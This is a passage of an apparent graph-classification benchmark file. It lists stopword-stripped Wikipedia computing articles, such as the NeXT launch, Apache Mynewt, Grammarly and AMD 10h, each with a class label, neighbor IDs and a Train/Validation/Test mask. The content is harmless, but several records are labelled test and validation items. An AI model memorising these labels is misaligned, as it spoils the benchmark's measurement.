    "text": "NeXT_Introduction:next introduction next introduction sub-titled introduction next generation computers education lavish invitation-only gala launch event next computer also called next computer system described multimedia extravaganza held louise m. davies symphony hall san francisco california wednesday october 12 1988 event ran 9:30am till 12 noon attendees given unique launch event poster steve jobs departed apple three years prior event sank sight emerging 1986 unveil next logo early 1987 announce h. ross perot invested 20 million next inc otherwise steve jobs shunned public appearances computer-industry events avoid comment publicly new company activities re-emerged launch described subtlety hollywood première first major public appearance since leaving apple jobs hired multimedia artist george coates stage unveiling time considered event launch new computer also new steve jobs jobs telling audience great back 3000 invitations sent educators software developers reporters launch event single apple employee invited company rented davies symphony hall supposedly good acoustics show dsps allowed cube play full stereo sound machine played duet one symphony ’ violinists jobs opened show purpose built animation built next ui architect keith ohlfs demonstrating history computer interfaces multi-tasking capabilities next computer following day 13th october saw follow-up event next day selected educators software developers invited 100 registration fee send four key individuals attend first public technical overview next computer held san francisco hilton event gave developers interested developing next software insight software architecture object-oriented programming developing next computer luncheon speaker steve jobs program designed experienced developers provided technical overview next software architecture development environment launch event replicated venues following days locations boston ’ symphony hall university california riverside attendee received agenda day launch poster given delegates launch event measured 37 17 printed heavy poster paper poster design consisted next computer screen keyboard mouse laser printer also incorporated next logo designed paul rand text october 12 1988 computing advances next level",
    "neighbors": [
      2282,
      7806
    ],
    "mask": "None"
  },
  {
    "node_id": 1124,
    "label": 9,
    "text": "Categorical_abstract_machine:categorical abstract machine categorical abstract machine cam model computation programs preserves abilities applicative functional compositional style based techniques applicative computing notion categorical abstract machine arose mid-1980s took place computer science kind theory computation programmers represented cartesian closed category embedded combinatory logic cam transparent sound mathematical representation languages functional programming machine code optimized using equational form theory computation using cam various mechanisms computation recursion lazy evaluation emulated well parameter passing call name call value theory cam preserves advantages object approach towards programming computing main current implementation ocaml added class inheritance dynamic method dispatch caml categorical abstract machine language variants metalanguage ml notable type-inference one implementation approaches functional languages given machinery based supercombinators sk-machine d. turner notion cam gives alternative approach structure cam consists syntactic semantic computational constituents syntax based de bruijn ’ notation overcomes difficulties using bound variables evaluations similar p. landin ’ secd machine coverage cam gives sound ground syntax semantics theory computation comprehension arises influenced functional style programming",
    "neighbors": [
      10403,
      1947,
      6536,
      1523,
      7386,
      10043
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1125,
    "label": 4,
    "text": "Message_submission_agent:message submission agent message submission agent msa mail submission agent computer program software agent receives electronic mail messages mail user agent mua cooperates mail transfer agent mta delivery mail uses esmtp variant simple mail transfer protocol smtp specified rfc 6409 many mtas perform function msa well also programs specially designed msas without full mta functionality historically internet mail mta msa functions use port number 25 official port msas 587 mta accepts user incoming mail msa accepts user outgoing mail separation mta msa functions produces several benefits one benefit msa since interacting directly author mua correct minor errors message format missing date message-id fields address missing domain name and/or immediately report error author corrected sent recipients mta accepting message another site reliably make kinds corrections error reports generated mta reach author message already sent one benefit dedicated port number 587 always possible users connect domain submit new mail combat spam including spam sent unwittingly victim botnet many isps institutional networks restrict ability connect remote mtas port 25 accessibility msa port 587 enables nomadic users example working laptop continue send mail via preferred submission servers even within others networks using specific submission server requirement sender policies signing practices enforced another benefit separating mta msa functions makes easier mta deny relaying refuse mail addressed recipient domain served locally strategy used isps prevent sending spam virus infected client computers contrast msa must generally accept mail recipient internet though accepts mail authors authorized use msa established identity msa via authentication times mail submission acceptance incoming mail usually accomplished using protocol server ability send mail arbitrary destinations without authentication allowed spammers use mtas means distributing spam since single message transaction request mta relay message large number recipients also made difficult trace message origin yet another benefit msas mtas different policies filtering spam msas require authentication form username password provided author messages received msa therefore traceable author direct relationship msa held accountable actions allows msa either spam filtering permissive spam filtering mta exists purpose accepting incoming email domains difficult establish trust mail sent arbitrary domains generally direct relationship domains via trust even identity established absence trust mta must generally rely heuristics third-party reputation services distinguish spam legitimate traffic mechanisms history error-prone separation msa mta therefore avoids use unreliable spam recognition mechanisms mail submission increases probability legitimate mail delivered successfully recent email clients use port 587 default older ones still propose port 25 users change port number manually latter case also possible mua may automatically discover server provides msa given domain looking srv records domain domain example.com publish record like rfc 6409 requires clients authorized authenticated use mail submission service e.g. described smtp-auth esmtpa means radius public key certificates mostly obsolete pop smtp msa must check submitted mail syntactically valid conforms relevant site policies rfc 6409 contains optional features",
    "neighbors": [
      2848,
      8386,
      4009,
      8202,
      10058,
      5421,
      3246,
      9744,
      6993,
      8337,
      4883,
      9909,
      10167,
      472,
      4793,
      8671
    ],
    "mask": "Test"
  },
  {
    "node_id": 1126,
    "label": 2,
    "text": "Apache_Mynewt:apache mynewt apache mynewt modular real-time operating system connected internet things iot devices must operate long times power memory storage constraints free open-source software incubating apache software foundation source code distributed apache license 2.0 permissive license conducive commercial adoption open-source software apache mynewt real-time operating system rich set libraries intended make prototyping deploying managing 32-bit microcontroller based iot devices easy highly composable allow building embedded system applications e.g. locks medical devices industrial iot across different types microcontrollers name mynewt wordplay english word minute meaning small kernel 6 kb size os designed connectivity comes full implementation bluetooth low energy 4.2 stack addition ble supporting bluetooth 4.2 compliant security features except privacy various utilities default file system console shell logs stats etc. image size approximately 96 kb nordic nrf51822 bluetooth soc size metric excludes boot loader image core operating system supports features utilities include first network stack available mynewt bluetooth low energy called nimble complies bluetooth core specification 4.2 nimble includes host controller components access controller source code makes ble performance highly configurable example ble throughput adjusted changing connection intervals data packet size packet queue size etc use case requiring large number concurrent connections similarly configured provided adequate ram allocated example applications demonstrate use available services included package operating system designed cross-platform use embedded systems devices microcontrollers includes board support packages following project includes newt tool command-line interface cli based smart source package manager system embedded systems development also allows composing builds specified packages compiler options generating images digital signatures finally downloading debugging firmware different targets",
    "neighbors": [
      2179,
      6276,
      10883,
      7818,
      7445,
      9366,
      7319,
      2201,
      1435,
      9628,
      9762,
      4773,
      4777,
      10030,
      7983,
      2224,
      4668,
      6207,
      321,
      7234,
      7235,
      10561,
      1221,
      8262,
      9927,
      6985,
      9162,
      5067,
      341,
      10590,
      6624,
      5603,
      5220,
      1253,
      1126,
      5612,
      6128,
      10482,
      2804,
      11383,
      2811,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1127,
    "label": 5,
    "text": "Multilink_Procedure:multilink procedure multilink procedure mlp subscription-time selectable option exists added upper sublayer data link layer operating packet layer multiplicity single data link protocol functions slps data link layer multilink procedure mlp must perform functions accepting packets packet layer distributing packets across available dce dte slps transmission dte dce slps respectively resequencing packets received dte dce slps delivery dte dce packet layer respectively mlp extension lapb allows multiple physical links thus providing better throughput device multiple lapb links implement mlp upper-layer management protocol allocate frames links mlp sees multiple lapb links pool links transmitting information higher-layer protocols frames higher-level software need aware multiple links exist mlp layer handles distributing frames among links thus gives upper layers full access links",
    "neighbors": [
      2912,
      5021,
      10647
    ],
    "mask": "Test"
  },
  {
    "node_id": 1128,
    "label": 8,
    "text": "Java_API_for_XML_Web_Services:java api xml web services java api xml web services jax-ws java programming language api creating web services particularly soap services jax-ws one java xml programming apis part java ee platform jax-ws 2.2 specification jsr 224 defines standard java- to-wsdl mapping determines wsdl operations bound java methods soap message invokes wsdl operation java-to-wsdl mapping determines java method gets invoked soap message mapped method ’ parameters mapping also determines method ’ return value gets mapped soap response jax-ws uses annotations introduced java se 5 simplify development deployment web service clients endpoints part java web services development pack jax-ws used java se starting version 6 jax-ws 2.0 replaced jax-rpc api java platform enterprise edition 5 leans towards document style web services api provides core project metro inside glassfish open-source application server community oracle corporation jax-ws also one foundations wsit",
    "neighbors": [
      4740,
      9988,
      8070,
      3341,
      10526,
      8096,
      10020,
      5677,
      7983,
      6067,
      6328,
      2106,
      1851,
      3517,
      3518,
      6334,
      3008,
      9665,
      11582,
      1095,
      3278,
      3920,
      4688,
      4959,
      4960,
      1250,
      3558,
      3560,
      8425,
      3562,
      9834,
      5612,
      3954,
      10486,
      10877
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1129,
    "label": 7,
    "text": "Grammarly:grammarly grammarly online grammar checking spell checking plagiarism detection platform english language developed grammarly inc software first released july 2009 grammarly proofreading resources check 250 grammar rules grammarly app automatically detects potential grammar spelling punctuation word choice style mistakes writing grammarly algorithms flag potential issues text suggest context-specific corrections grammar spelling wordiness style punctuation plagiarism available via browser extension chrome safari firefox edge grammarly available app ios android premium service available monthly annual payment developed 2009 ukrainians alex shevchenko max lytvyn kiev backend grammar engine written common lisp app owned grammarly inc san francisco area california 2018 security bug discovered desktop web browser extension version grammarly allowed websites access everything user ever typed grammarly editor bug rapidly fixed grammarly said evidence security vulnerability used access customers ’ account data october 2018 grammarly announced support google docs",
    "neighbors": [
      5636,
      7780,
      4326,
      8204,
      5325,
      2062,
      5078,
      9241,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 1130,
    "label": 9,
    "text": "Frink_(programming_language):frink programming language frink computer programming language according creator language designed make physical calculations simple help ensure answers come right make tool really useful real world tracks units measure feet meters kilograms watts etc calculations allowing mix units measure transparently helps easily verify answers make sense frink named professor frink recurring character animated television series simpsons",
    "neighbors": [
      9345,
      3462,
      8582,
      10387,
      1435,
      9245,
      7326,
      3876,
      4777,
      5677,
      6074,
      6718,
      8644,
      8262,
      5833,
      8524,
      7889,
      11219,
      2519,
      477,
      6502,
      10470,
      11625,
      8554,
      10991,
      5872,
      3960,
      3705,
      7292,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1131,
    "label": 9,
    "text": "O-Matrix:o-matrix o-matrix matrix programming language mathematics engineering science financial analysis marketed harmonic software language designed use high-performance computing o-matrix provides integrated development environment matrix-based scripting language environment includes mathematical statistical engineering visualization functions set analysis functions designed development complex computationally intensive scientific mathematical engineering applications integrated environment provides mode largely compatible version 4 matlab language commercial product mathworks certain features matlab non-numeric data types structures cell arrays objects error handling try/catch nested anonymous functions missing o-matrix o-matrix environment includes virtual machine o-matrix language enable re-distribution applications",
    "neighbors": [
      8262,
      10145,
      9780,
      7326
    ],
    "mask": "Test"
  },
  {
    "node_id": 1132,
    "label": 2,
    "text": "EuroLinux:eurolinux eurolinux campaigning organisation promotes open source software free software europe opposed european union proposals introduce laws software patents also known eurolinux alliance umbrella organisation linux user groups europe describes eurolinux alliance free information infrastructure open coalition commercial companies non-profit associations united promote protect vigorous european software culture based copyright open standards open competition open source software linux corporate members sponsors eurolinux develop sell software free semi-free non-free licenses operating systems linux mac os microsoft windows eurolinux organised public eu campaign software patents signed 300,000 people members include ffii april aful ael european linux user group lug umbrella associations",
    "neighbors": [
      7983,
      6797,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 1133,
    "label": 9,
    "text": "Robert_Fourer:robert fourer robert fourer born september 2 1950 scientist working area operational research management science currently president ampl optimization inc professor emeritus industrial engineering management sciences northwestern university robert fourer recognized designer popular modeling language mathematical programming called ampl together david m. gay brian kernighan awarded 1993 orsa/csts prize computer science technical section operations research society america writings design mathematical programming systems ampl modeling language robert fourer also awarded guggenheim fellowship natural sciences 2002 ampl modeling language mathematical programming 2nd ed 2003 david gay brian kernighan",
    "neighbors": [
      9915
    ],
    "mask": "None"
  },
  {
    "node_id": 1134,
    "label": 7,
    "text": "Kubity:kubity kubity cloud-based 3d communication tool works desktop computers web smartphones tablets augmented reality gear virtual reality glasses kubity powered proprietary 3d crystallization engine called paragone prepares 3d file transfer mobile devices kubity practical applications architecture interior design engineering product design film video games among others majority users create 3d models using sketchup autodesk revit software kubity products include kubity pro plugin sketchup revit kubity go mobile application ios android kubity compatible across many platforms devices operating systems including ios android firefox chrome windows macos linux kubity created paris-based software company kubity s.a.s. designs develops cloud-based visual communication tools 3d models founded 2012 group software engineers urban projects developer united around simple idea create way anyone anywhere simply intuitively explore 3d models smartphones computers order bring architects engineers designers together clients around 3d model essential develop interactive platform supported multiple desktop mobile devices instantaneous fluid 3d navigation specifications place 15 engineers fused together several technologies 3d design data compression decimation rendering optimization web mobile transfer virtual reality headset integration january 2014 first public kubity prototype 1.0 amethyst launched small group beta testers plug-in allowed users import 3d models sketchup browser global release announced april 2014 sketchup basecamp vail colorado may 2015 kubity launched web application worked using webgl technology 2.0 citrine first time users able drag drop sketchup file web browser without install plug-in december 2015 kubity launched mobile application app store iphone ipod ipad well google play android devices 3.0 druzy november 2016 kubity launched support oculus rift htc vive 4.0 emerald beginning november 2017 kubity launched full suite rollout mobile applications six months included kubity ar augmented reality kubity vr virtual reality kubity mirror remote presentations screen mirroring 5.0 feldspar september 2018 one-click plugin sketchup revit kubity pro along mobile-first revamp kubity go launched allowing pro-to-go device pairing automatic mobile sync 6.0 gypsum early 2019 kubity go application updated include fully integrated ar vr screen mirroring functionalities killing dedicated companion apps kubity ar kubity vr kubity mirror process 7.0 heliotrope kubity powered proprietary 3d crystallization engine known paragone technology developed kubity s.a.s paragone takes constrained information 3d file runs blockwave algorithm also developed kubity s.a.s blockwave multiphase optimization algorithm combines 3d design data compression decimation rendering optimization web mobile transfer mixed reality headset integration create crystallized universal format original file one phase blockwave algorithm based quadric-based polygonal surface simplification algorithm performed using predefined heuristics associated plurality simplified versions 3d model version associated predefined level detail adapted user specific end device blockwave extracts data content geometry textures sets quadrics top original 3d model identifies pairs adjacent tops linked vertices algorithm uses local collapsing operator top-plan error metric obtain fixed number faces maximum defined error 3d meshing simplified replacing two points one deleting degrading faces updating adjacent relations decimation completed texture optimization set using texture target parameters allowing maximized gpu memory improve computing time texture encoding completed crystallized universal 3d file easily opened user-specific end device played across kubity suite tools real-time rendering user converts crystallizes 3d file exporting kubity pro plugin crystallization adds features like ar/vr cinematic fly-through tour well assigns model dedicated qr code 3d model exported kubity pro automatically synced kubity go user mobile device accessed explored shared others without internet connection user models managed one place kubity go models renamed password-protected shared played developed using apple arkit google arcore technology kubity ar maps environment room detecting horizontal planes like tables floors track place 3d objects blending digital objects information environment kubity ar allows users interact 3d models true augmented reality built-in communication features allows users instantly share 3d models anyone text email social media direct device-to-device qr code platform support ar supports devices running ios11 including iphone se iphone 6s iphone 6s plus iphone 7 iphone 7 plus iphone 8 iphone x ipad pro models ipad 2017 ar android requires android 7.0 later access google play store full list compatible devices found arcore developer website vr allows users explore sketchup models revit projects on-the-go right mobile device using google cardboard samsung gear vr glasses-free magic window feature kubity vr compatible google cardboard viewers cardboard compatible devices including clip-on style vr glasses like homido mini well mobile virtual reality headset samsung gear vr samsung gear vr supports galaxy s6 galaxy s6 edge galaxy s6 edge+ samsung galaxy note 5 galaxy s7 galaxy s7 edge galaxy s8 galaxy s8+ samsung galaxy note fan edition samsung galaxy note 8 samsung galaxy a8/a8+ 2018 samsung galaxy s9/galaxy s9+ screen mirroring allows user sync sender device receiver webpage mirror.kubity.com control sender device give remote presentation 3d model devices easily synced entering six-digit number displayed receiving computer kubity 3d communication tool sketchup models revit projects designed work together desktop plugin mobile app user downloads installs plugin sync mobile device plugin using kubity go mobile application model exported kubity 3d crystallization engine automatically optimizes 3d integrates augmented virtual reality features creates secure crystallized format original file kubity go mobile app kubity pro paired kubity pro account display exported sketchup revit models seamlessly across devices allow immersive ar/ vr experiences remote presentations device-to-device share on-the-go access features include cinematic tour walk mode clay mode share augmented reality virtual reality screen mirroring kubity pro plugin available sketchup extension warehouse autodesk app store kubity go free download app store google play ios kubity application compatible devices running version 9.0 higher android kubity compatible devices running version 4.4 “ kit kat ” higher web version kubity applications currently support web browsers compatible webgl2 mozilla firefox google chrome ar compatible devices running ios11 including iphone se iphone 6s iphone 6s plus iphone 7 iphone 7 plus iphone 8 iphone x ipad pro models ipad 2017 android devices requires android 7.0 later access google play store vr compatible google cardboard viewers cardboard compatible devices including clip-on style vr glasses like homido mini well samsung gear vr oculus go samsung gear vr supports galaxy s6 galaxy s6 edge galaxy s6 edge+ samsung galaxy note 5 galaxy s7 galaxy s7 edge galaxy s8 galaxy s8+ samsung galaxy note fan edition samsung galaxy note 8 samsung galaxy a8/a8+ 2018 samsung galaxy s9/galaxy s9+ technology developed kubity used products created kubity s.a.s including rvt2skp pro — plugin revit allows users export revit file sketchup file 2vr — dedicated plugin sketchup revit allows instant 3d exploration 1:1 scale immersive desktop vr compatible oculus rift htc vive",
    "neighbors": [
      4194,
      6186,
      6797,
      7983,
      8754,
      1427,
      5078,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 1135,
    "label": 1,
    "text": "DaDaBIK:dadabik dadabik no-code low-code development platform written php quickly creating crud create read update delete database front-end sophisticated database-driven web application without coding database management systems currently supported mysql postgresql sqlite starting version 9.2 microsoft sql server dadabik originally released 2001 sourceforge gnu general public license eugenio tacchini supported mysql version 4.5 release june 2012 license changed gpl proprietary dadabik 1.0 license requires payment downloading prohibits redistribution old gpl code dadabik v. 4.x removed official website sourceforge project still distributed freely current version moment 9.1 monterosso downloaded official website version 6 introduced new features including possibility add custom hand-coded php pages dadabik application version 8 lerici important milestone development dadabik new responsive front-end introduced together many new features including graph reports generation calculated fields hooks smart installation dadabik tries automatically configure application according database schema new license dadabik license v. 2.0 also introduced version 9 monterosso another important milestone development dadabik dadabik 9 allows build web application without coding starting excel csv ods file v.9 could build dadabik application starting database several new features help power users develop complex applications also introduced including custom buttons dashboards layout hooks new license dadabik license v. 2.1 also introduced version 9.2 introduced support microsoft sql server current last release 9.4 monterosso released july 23 2019 original author still main developer behind core code simone magnaschi takes care ux e ui design group mother tongue users handle translation/localization front-end available 22 languages main features forms customization e.g labels different types html input field content check lookup fields master/details view files upload calculated fields hooks graph report generation export csv checking possible duplication insertions authentication authorization restrictions view/update/delete e-mail notices dadabik used several big organizations like university cambridge università cattolica del sacro cuore considered one popular php database tools dadabik recursive acronym stands dadabik database interfaces kreator",
    "neighbors": [
      8644,
      5546,
      5612,
      7022,
      7983,
      11030,
      9177,
      8539
    ],
    "mask": "Test"
  },
  {
    "node_id": 1136,
    "label": 1,
    "text": "Perst:perst perst open source dual license object-oriented embedded database management system odbms java programming language c programming language versions compact perst implemented smart phones running android windows phone wp7 operating systems perst launched 2003 russia designed achieve high-performance tightly integrating database programming language perst directly stores data language objects 2006 mcobject llc based issaquah wa took development perst continues offer free downloads added commercial license options perst first written java ported c although originally designed desktop- server-based software perst also found usage providing database management mobile applications running devices smartphones mobile devices typically hardware constraints limited ram cpu cycles available non-standard database systems operating requirements support java silverlight windows phone 7 mobile platform currently available versions perst perst .net perst java perst lite perst java perst lite bundled single software distribution perst .net supports c versions 1.0 2.0 source code support specific c 2.0 features template classes provided compile time compatible standard compact .net frameworks well silverlight operate microsoft windows phone 7 wp7 windows embedded compact formerly windows ce perst java supports j2se/j2ee versions 1.3 1.4 well j2se/j2ee version 5 compatible android smartphone environment perst lite perst java implementation runs devices blackberry smartphones based java j2me mobile device platform memory footprint approximately 30 percent smaller standard perst perst engine ’ size 5,000 lines source code run time random-access memory ram needs range 30k 300k perst transactions support acid properties atomicity consistency isolation durability automatic recovery perst provides subset sql filtering elements container class access stored objects perst implements specialized collection classes including facilitate changes existing database design database schema perst implements “ lazy ” database schema evolution object instance loaded database class descriptor compared format class application identical object changed object converted stored new format “ eager ” schema evolution format changes would sweep database proscout demo midlet using perst lite java environment demonstration discrete note-taking facility sports recruiter originally implemented blackberry also deployed nokia s60 mcobject provides demo app crm system using perst .net including fully text-searchable contact database runs desktop browser silverlight andy wigley appamundi ported demo app windows phone described project series blog postings users redistribute and/or modify perst terms gnu general public license version 2 later published free software foundation individuals organizations wish comply gpl commercial license available mcobject",
    "neighbors": [
      2304,
      8201,
      3219,
      2456,
      1049,
      2208,
      11559,
      10921,
      5677,
      10413,
      7983,
      1083,
      10048,
      10693,
      8262,
      7246,
      2383,
      479,
      3560,
      3561,
      3562,
      5612,
      5103,
      6769,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 1137,
    "label": 3,
    "text": "AMD_10h:amd 10h amd family 10h k10 microprocessor microarchitecture amd based k8 microarchitecture though reports k10 canceled first third-generation opteron products servers launched september 10 2007 phenom processors desktops following launching november 11 2007 immediate successors k8 series processors athlon 64 opteron 64-bit sempron commonly perceived pc community time use codename k8 amd k8 athlon 64 processor family amd longer uses k-nomenclatures originally stood kryptonite since k-nomenclature naming convention beyond k8 appeared official amd documents press releases beginning 2005 name k8l first coined charlie demerjian one writers inquirer back 2005 used wider community convenient shorthand according amd official documents processor family termed amd next generation processor technology microarchitecture also referred stars codenames desktop line processors named stars constellations initial phenom models codenamed agena toliman video interview giuseppe amato confirmed codename k10 revealed inquirer codename k8l referred low-power version k8 family later named turion 64 k10 official codename microarchitecture amd refers family 10h processors successor family 0fh processors codename k8 10h 0fh refer main result cpuid x86 processor instruction hexadecimal numbering 0fh h represents hexadecimal numbering equals decimal number 15 10h equals decimal 16 k10h form sometimes pops improper hybrid k code family identifier number 2003 amd outlined features upcoming generations microprocessors k8 family processors various events analyst meetings including microprocessor forum 2003 outlined features deployed next-generation microprocessors follows april 13 2006 henri richard amd executive vice president chief officer marketing sales acknowledged existence new microarchitecture interview june 2006 amd executive vice president henri richard another interview digitimes commented upcoming processor developments july 21 2006 amd president chief operating officer coo dirk meyer senior vp marty seyer confirmed launch date new microprocessors revision h new microarchitecture slated middle 2007 contain quad core version servers workstations high-end desktops well dual core version consumer desktops revision h opterons shipped 2007 thermal design power 68 w. august 15 2006 launch first socket f dual-core opterons amd announced firm reached final design stage tape-out quad-core opteron parts next stages testing validation sampling follow several months june 29 2007 amd stated server processors codenamed barcelona ship august 2007 corresponding server systems partners ship september year august 13 reported ship dates first barcelona processors set september 10 2007 announced opteron 2348 2350 core frequencies 1.9 ghz 2.0 ghz november 2007 amd stopped delivery barcelona processors bug translation lookaside buffer tlb stepping b2 discovered could rarely lead race condition thus system lockup patch bios software worked around bug disabling cache page tables connected 5 20 performance penalty kernel patches would almost completely avoid penalty published linux april 2008 new stepping b3 brought market amd including fix bug plus minor enhancements november 2006 reports leaked upcoming desktop part codenames agena agena fx core speeds parts range 2.4 ghz 2.9 ghz respectively 512 kb l2 cache core 2 mb l3 cache using hypertransport 3.0 tdp 125 w. recent reports single core variants codenamed spica dual core without l3 cache codenamed kuma rana respectively available microarchitecture amd analyst day 2006 december 14 2006 amd announced official timeline server desktop mobile processors servers segment amd unveil two new processors based architecture codenamed barcelona budapest 8/4/2-way 1-way servers respectively second half 2007 hypertransport 3.0 socket am2+ unveiled designed specific implementation aforementioned consumer quad core desktop chip series naming convention changes city names middle 2007 stars constellations agena addition amd quad fx platform immediate successor support high end enthusiast dual-processor versions chip codenamed agena fx updates processors line amd quad fx platform server chips codenamed barcelona new desktop quad core series feature shared l3 cache 128-bit floating point fp units enhanced microarchitecture agena native quad-core processor desktop kuma dual-core variant follow q3 rana dual-core version shared l3 cache expected end year information upcoming chip codenamed montreal server roadmap using mcm technique two shanghai cores total 12 mb l3 cache codenamed amd k10.5 desktop variant shanghai codenamed ridgeback afterwards release products based bulldozer cores optimized integrated graphics core amd accelerated processing unit native octal-core 8 core server architecture codenamed sandtiger bobcat core optimized low-power operations computex 2007 early june new information regarding naming schemes upcoming amd microprocessors emerged additional letters indicating performance power envelope precede 4 digit model number model numbers new line processors apparently changed pr ratings used predecessors athlon 64 series processors except phenom fx series suggested follow nomenclature athlon 64 fx series reported dailytech model numbers alpha-numeric format aa- aa alphabetical letters first letter indicating processor class second indicating typical tdp power envelope character series indicator varies branding see table last three characters model number higher numbers indicating greater performance much information known details model numbers processors divided three segments premium intermediate value premium segment model numbers processor class g intermediate segment b value level l discovered web asrock website similarly three levels tdp 65w 65w less 65w indicated letters p e respectively november 2007 amd removed letters model names x2/x3/x4 monikers depicting number cores processor leaving four digit model number first character sole identification processor family sempron remained using le prefix follows november 30 2006 amd live demonstrated native quad core chip known barcelona first time public running windows server 2003 64-bit edition amd claims 70 scaling performance real world loads better performance intel xeon 5355 processor codenamed clovertown details regarding first revision next generation amd microprocessor architecture surfaced web including clock speeds january 24 2007 amd executive vice president randy allen claimed live tests regard wide variety workloads barcelona able demonstrate 40 performance advantage comparable intel xeon codenamed clovertown dual-processor 2p quad-core processors expected performance floating point per core would approximately 1.8 times k8 family clock speed may 10 2007 amd held private event demonstrating upcoming processors codenamed agena fx chipsets one demonstrated system amd quad fx platform one radeon hd 2900 xt graphics card upcoming rd790 chipset system also demonstrated real-time converting 720p video clip another undisclosed format 8 cores maxed 100 tasks also due similar time frame sister microarchitecture focus lower power consumption chips mobile platforms well small form factor features microarchitecture contain specialized features mobile optimized crossbar switch memory controller on-die components link power management hypertransport 3.0 others time amd simply dubbed new mobile core without giving specific codename december 2006 analyst day executive vice president marty seyer announced new mobile core codenamed griffin launched 2008 inherited power optimizations technologies k10 microarchitecture based k8 design late 2007 second quarter 2008 modification core fabricated 45 nm process node enhancements fb-dimm support direct connect architecture 2.0 enhanced reliability availability serviceability ras probably processor die platform also add support i/o virtualization pci express 2.0 10 gigabit nic larger caches however reports suggested fb-dimm support dropped future roadmaps majority amd products since popularity low also fb-dimm future industry standard called question article published inquirer corroborates earlier reports timeline cited article according report three iterations server processor core one named barcelona due q2 2007 new cpu core components well microarchitecture built old hypertransport 2.0 infrastructure second budapest single socket systems using socket am2+ socket am3 hypertransport 3.0 third codenamed shanghai update server chip based 45 nm process probably also hypertransport 3.0 ddr3 implementation due q1-q2 2008 amd september 17 2007 announced three core triple-core processor also released phenom brand lineup codenamed toliman amd official replied interview product benefitted ati technologies add fuses quad-core processor shutting one four cores become triple-core processor technique popular making one mainstream gpu cores single high-end gpu core blowing parts circuit save r costs targeting markets time ago triple-core processor still see specifications quad-core variants naming processor lineup according amd branding scheme named phenom triple-core 8000 series processor line focused amd called fourth market segment high-end mainstream segment beside value mainstream performance segments interview betanews targeted customers processors willing pay performance required much processing power required gamers system builders single core sempron variants low-end market dual-core athlon variants mid-range market quad-core phenom quad-core 9000 series phenom fx variants seen high-end market time frame 2008 amd introduce deneb fx replacement amd quad fx platform well deneb mainstream propos regor also replace kuma rana lower market segments socket am2+ named late 2006 might actually original am3 socket naming conventions changed next generation consumer desktop socket capable ddr3 socket am3 amd introduced microprocessors manufactured 65 nm feature width using silicon-on-insulator soi technology since release k10 coincides volume ramp manufacturing process servers produced socket f 1207 later 1207-pin socket infrastructure server socket amd near-term roadmap desktop parts come socket am2 socket am2+ amd announced technology analyst day use continuous transistor improvement cti shared transistor technology stt would finally lead implementation silicon-germanium-on-insulator sgoi 65 nm process cpus later processors manufactured using 45nm soi technology apu k10 processors manufactured using 32nm soi technology starting 45nm immersion lithography used k8 family known particularly sensitive memory latency since design gains performance minimizing use on-die memory controller integrated cpu increased latency external modules negates usefulness feature ddr2 ram introduces additional latency traditional ddr ram since dram internally driven clock one quarter external data frequency opposed one half ddr however since command clock rate ddr2 doubled relative ddr latency-reducing features e.g additive latency introduced common comparisons based cas latency alone sufficient example socket am2 processors known demonstrate similar performance using ddr2 sdram socket 939 processors utilize ddr-400 sdram k10 processors support ddr2 sdram rated ddr2-1066 1066 mhz desktop k10 processors am2+ supporting ddr2 am3 k10 processor supports ddr2 ddr3 am3 motherboards ddr2 ddr3 slots mean fit types time part ddr3 lynx desktop processors support ddr3 use fm1 socket also reported several sources anandtech inquirer geek.com microprocessors implementing microarchitecture feature doubling width sse execution units cores help major improvements memory subsystem load re-ordering improved prefetch mechanisms well doubled instruction fetch load expected increase suitability processor scientific high-performance computing tasks potentially improve competitiveness intel xeon core 2 itanium 2 contemporary microprocessors many improvements computational throughput core listed characteristics microarchitecture include following amd released limited edition deneb-based processor extreme overclockers partners fewer 100 manufactured 42 officially represents four cores running 2 ghz also reference answer life universe everything hitchhiker guide galaxy first generation desktop apus based k10 microarchitecture released 2011 models provide graphics capability lynx athlon ii sempron x2 models two generations k10-based processors servers opteron 65 nm 45 nm amd discontinued development k10 based cpus thuban choosing focus fusion products mainstream desktops laptops bulldozer based products performance market however within fusion product family apus first generation a4 a6 a8-series chips llano apus continued use k10-derived cpu cores conjunction radeon graphics core k10 derivatives phased production introduction trinity-based apus 2012 replaced k10 cores apu bulldozer-derived cores family 11h microarchitecture mixture k8 k10 designs lower power consumption laptop marketed turion x2 ultra later replaced completely k10-based designs family 12h microarchitecture derivative k10 design note media discussions listed ascending date publication",
    "neighbors": [
      3586,
      8322,
      5380,
      8452,
      9092,
      6151,
      3464,
      4872,
      8327,
      9475,
      6924,
      5645,
      398,
      6926,
      10375,
      7963,
      2719,
      6815,
      9122,
      5541,
      9126,
      8231,
      2088,
      6184,
      11047,
      2094,
      11183,
      6705,
      8629,
      823,
      9400,
      8125,
      8126,
      6978,
      7234,
      11331,
      9157,
      11080,
      2764,
      5326,
      9551,
      977,
      7122,
      9427,
      2516,
      5844,
      4695,
      473,
      4451,
      5859,
      7783,
      1515,
      5356,
      1005,
      4334,
      9964,
      1776,
      1137,
      10734,
      499,
      2549,
      3070
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1138,
    "label": 2,
    "text": "Opkg:opkg opkg open package management lightweight package management system based upon ipkg written c resembles advanced packaging tool apt /dpkg operation intended use embedded linux devices used capacity openembedded openwrt projects opkg originally forked ipkg openmoko project recently development opkg moved old google code repository yocto project actively maintained opkg packages use codice_1 extension",
    "neighbors": [
      4225,
      11525,
      2310,
      10760,
      2955,
      7435,
      7181,
      7947,
      9487,
      2448,
      788,
      1813,
      8213,
      10900,
      6680,
      8476,
      6301,
      5670,
      4775,
      7847,
      6828,
      6446,
      7983,
      1842,
      823,
      2872,
      6583,
      3131,
      5819,
      10172,
      190,
      3649,
      10817,
      9671,
      5067,
      3918,
      463,
      3667,
      6227,
      4309,
      7293,
      4951,
      10451,
      6361,
      2010,
      9564,
      2401,
      1379,
      7140,
      741,
      231,
      5096,
      4841,
      6119,
      6763,
      9063,
      9324,
      7920,
      6257,
      1522,
      10096,
      6393,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1139,
    "label": 4,
